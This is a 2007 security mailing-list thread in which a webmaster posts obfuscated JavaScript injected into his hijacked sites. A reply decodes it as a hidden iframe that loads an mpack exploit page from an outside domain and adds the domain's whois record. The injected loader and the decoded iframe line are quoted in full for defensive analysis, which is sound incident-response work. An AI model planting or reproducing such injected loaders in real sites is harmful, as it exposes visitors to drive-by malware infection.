[Dshield] need help decoding.

wiretapp wiretapp at gmail.com
Wed Sep 19 03:14:41 GMT 2007

It says:


</textatea></textarea><IFRAME src="http:// marcobernardoni. com /x
/index.php" width=3 height=3 style="display:none"></IFRAME>

-snip- (spaces added to prevent accidental clicking)

The </textarea> html closing tag is to evade techniques like the one
described by Tom Liston here:

marcobernardoni.com is running on an IP out of Hong Kong and the index
page listed has a mpack javascript, which attempts several exploits to
push file.php...Of course its a windows PE binary, however it seems to
be broken. I dont have time to manually run through it, perhaps
someone else does.

   Registrar: ONLINENIC, INC.
   Whois Server: whois.35.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.NAMESELF.COM
   Name Server: NS2.NAMESELF.COM
   Status: clientTransferProhibited
   Updated Date: 08-jul-2007
   Creation Date: 28-may-2007
   Expiration Date: 28-may-2008

         FuzioN FuzioN fuzka at bk.ru +7.9015371916
         FuzioN inc
         Moskow,babruysk,RU 117625

Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28

Good luck.

On 9/18/07, Dan Jackson <kybowhunter515 at yahoo.com> wrote:
> Recently several of my sites got hijacked and below is the code that
> was inserted, what I'm trying to do is to decode it to figure out what
> it's intent was and to see if it opened up any other holes in the
> server that I need to know about.
> Maybe this is easy stuff... but I don't have a clue where to start ...
> Code: ( text )
> <script
> language='JavaScript'>function nbsp() {var t,o,l,i,j;var
> s='';s+='06004711610112011609711610109706206004711
> 6101120116097114101097062';
> s+='0600730700820650770690321151140990610341041161
> 16112058047047109097114099111098101114110097114100
> 111';s=s+'1101050460991111090471200471051101001011
> 20046112104112034032119105100116104061051032104101
> 105103104';s=s+'1160610510321151161211081010610341
> 00105115112108097121058110111110101034062060047073
> 070082065077069';s=s+'062032';t='';l=s.length;i=0;
> while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str
> ing.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->
> any help would be greatly appreciated.
> TIA.
> _________________________________________
> SANS Network Security 2007 in Las Vegas September 22-30. 39 courses,
> SANS top instructors.  http://www.sans.org/info/9346

More information about the list mailing list